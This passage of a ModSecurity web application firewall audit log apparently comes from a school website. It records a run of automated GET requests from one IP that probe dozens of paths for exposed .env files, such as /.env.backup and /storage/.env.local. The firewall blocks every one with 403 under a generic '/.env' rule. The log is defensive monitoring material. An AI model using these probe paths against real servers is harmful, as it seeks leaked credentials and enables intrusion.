Stopwatch2: 1745151903721728 792; combined=313, p1=281, p2=0, p3=0, p4=0, p5=32, sr=126, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3bcd5409-Z--
--d6afde47-A--
[20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr4wAAANg 103.236.140.4 38358 103.236.140.4 8181
--d6afde47-B--
GET /main/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--d6afde47-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d6afde47-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151903792726 682 (- - -)
Stopwatch2: 1745151903792726 682; combined=294, p1=260, p2=0, p3=0, p4=0, p5=33, sr=105, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d6afde47-Z--
--d2690c1e-A--
[20/Apr/2025:19:25:03 +0700] aATnn1u16wJWB6g0mU8NpQAAAA0 103.236.140.4 38360 103.236.140.4 8181
--d2690c1e-B--
GET /pemerintah/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--d2690c1e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d2690c1e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151903863636 688 (- - -)
Stopwatch2: 1745151903863636 688; combined=298, p1=256, p2=0, p3=0, p4=0, p5=41, sr=101, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d2690c1e-Z--
--bfd5b430-A--
[20/Apr/2025:19:25:03 +0700] aATnn1Tf0pL9EQC7JDUZ2AAAAEs 103.236.140.4 38362 103.236.140.4 8181
--bfd5b430-B--
GET /api2/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--bfd5b430-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bfd5b430-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151903934988 760 (- - -)
Stopwatch2: 1745151903934988 760; combined=293, p1=247, p2=0, p3=0, p4=0, p5=46, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bfd5b430-Z--
--e6e1c672-A--
[20/Apr/2025:19:25:04 +0700] aATnoFu16wJWB6g0mU8NpgAAAAU 103.236.140.4 38364 103.236.140.4 8181
--e6e1c672-B--
GET /api3/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--e6e1c672-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e6e1c672-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151904005097 748 (- - -)
Stopwatch2: 1745151904005097 748; combined=297, p1=251, p2=0, p3=0, p4=0, p5=45, sr=95, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e6e1c672-Z--
--45e4db5a-A--
[20/Apr/2025:19:25:04 +0700] aATnoFTf0pL9EQC7JDUZ2QAAAFc 103.236.140.4 38366 103.236.140.4 8181
--45e4db5a-B--
GET /webs/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--45e4db5a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--45e4db5a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151904076868 797 (- - -)
Stopwatch2: 1745151904076868 797; combined=322, p1=278, p2=0, p3=0, p4=0, p5=44, sr=115, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--45e4db5a-Z--
--b003e624-A--
[20/Apr/2025:19:25:04 +0700] aATnoMTCDeBrh52UaHS-SQAAAJc 103.236.140.4 38368 103.236.140.4 8181
--b003e624-B--
GET /asset/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--b003e624-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b003e624-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151904147872 708 (- - -)
Stopwatch2: 1745151904147872 708; combined=262, p1=226, p2=0, p3=0, p4=0, p5=36, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b003e624-Z--
--d0111454-A--
[20/Apr/2025:19:25:04 +0700] aATnoFTf0pL9EQC7JDUZ3AAAAFE 103.236.140.4 38378 103.236.140.4 8181
--d0111454-B--
GET /cp/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--d0111454-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d0111454-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151904993278 935 (- - -)
Stopwatch2: 1745151904993278 935; combined=386, p1=338, p2=0, p3=0, p4=0, p5=48, sr=138, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d0111454-Z--
--66824a73-A--
[20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NpwAAAAM 103.236.140.4 38380 103.236.140.4 8181
--66824a73-B--
GET /sources/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--66824a73-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--66824a73-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151905064354 674 (- - -)
Stopwatch2: 1745151905064354 674; combined=252, p1=220, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--66824a73-Z--
--83c86872-A--
[20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NqAAAABU 103.236.140.4 38382 103.236.140.4 8181
--83c86872-B--
GET /.env.save HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--83c86872-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--83c86872-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151905134682 670 (- - -)
Stopwatch2: 1745151905134682 670; combined=256, p1=225, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--83c86872-Z--
--a011174d-A--
[20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NqQAAAAo 103.236.140.4 38384 103.236.140.4 8181
--a011174d-B--
GET /.env.local HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--a011174d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a011174d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151905204711 740 (- - -)
Stopwatch2: 1745151905204711 740; combined=315, p1=265, p2=0, p3=0, p4=0, p5=50, sr=110, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a011174d-Z--
--4e177b7c-A--
[20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NqgAAAAs 103.236.140.4 38386 103.236.140.4 8181
--4e177b7c-B--
GET /script/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--4e177b7c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4e177b7c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151905274743 808 (- - -)
Stopwatch2: 1745151905274743 808; combined=312, p1=268, p2=0, p3=0, p4=0, p5=44, sr=113, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4e177b7c-Z--
--21f7d77c-A--
[20/Apr/2025:19:25:05 +0700] aATnocTCDeBrh52UaHS-SgAAAJE 103.236.140.4 38388 103.236.140.4 8181
--21f7d77c-B--
GET /blog/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--21f7d77c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--21f7d77c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151905345913 787 (- - -)
Stopwatch2: 1745151905345913 787; combined=317, p1=282, p2=0, p3=0, p4=0, p5=34, sr=112, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--21f7d77c-Z--
--83a05a54-A--
[20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NqwAAAAE 103.236.140.4 38390 103.236.140.4 8181
--83a05a54-B--
GET /.env.prod HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--83a05a54-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--83a05a54-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151905415991 726 (- - -)
Stopwatch2: 1745151905415991 726; combined=260, p1=216, p2=0, p3=0, p4=0, p5=44, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--83a05a54-Z--
--36c76101-A--
[20/Apr/2025:19:25:05 +0700] aATnocTCDeBrh52UaHS-SwAAAJQ 103.236.140.4 38392 103.236.140.4 8181
--36c76101-B--
GET /storage/.env.local HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--36c76101-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--36c76101-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151905490210 680 (- - -)
Stopwatch2: 1745151905490210 680; combined=281, p1=250, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--36c76101-Z--
--8335fe0c-A--
[20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NrAAAABQ 103.236.140.4 38394 103.236.140.4 8181
--8335fe0c-B--
GET /enviroments/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--8335fe0c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8335fe0c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151905559649 750 (- - -)
Stopwatch2: 1745151905559649 750; combined=303, p1=261, p2=0, p3=0, p4=0, p5=42, sr=106, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8335fe0c-Z--
--6fce6a4f-A--
[20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NrQAAAAQ 103.236.140.4 38396 103.236.140.4 8181
--6fce6a4f-B--
GET /application/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--6fce6a4f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6fce6a4f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151905630209 756 (- - -)
Stopwatch2: 1745151905630209 756; combined=327, p1=294, p2=0, p3=0, p4=0, p5=33, sr=108, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6fce6a4f-Z--
--49dc2d18-A--
[20/Apr/2025:19:25:05 +0700] aATnocTCDeBrh52UaHS-TAAAAI0 103.236.140.4 38402 103.236.140.4 8181
--49dc2d18-B--
GET /icons/.env/.env.development HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--49dc2d18-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--49dc2d18-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151905700857 691 (- - -)
Stopwatch2: 1745151905700857 691; combined=253, p1=221, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--49dc2d18-Z--
--979fe60c-A--
[20/Apr/2025:19:25:05 +0700] aATnoUAzeWrUIk0gvAsr5QAAAMY 103.236.140.4 38404 103.236.140.4 8181
--979fe60c-B--
GET /.env.backup HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--979fe60c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--979fe60c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151905771163 857 (- - -)
Stopwatch2: 1745151905771163 857; combined=338, p1=290, p2=0, p3=0, p4=0, p5=48, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--979fe60c-Z--
--d0c0865a-A--
[20/Apr/2025:19:25:05 +0700] aATnoUAzeWrUIk0gvAsr5gAAAMc 103.236.140.4 38406 103.236.140.4 8181
--d0c0865a-B--
GET /backend/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--d0c0865a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d0c0865a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151905841660 805 (- - -)
